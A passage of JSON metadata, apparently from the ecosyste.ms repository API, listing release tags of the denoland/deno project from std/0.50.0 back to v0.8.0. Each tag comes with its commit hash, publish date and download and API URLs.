_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262f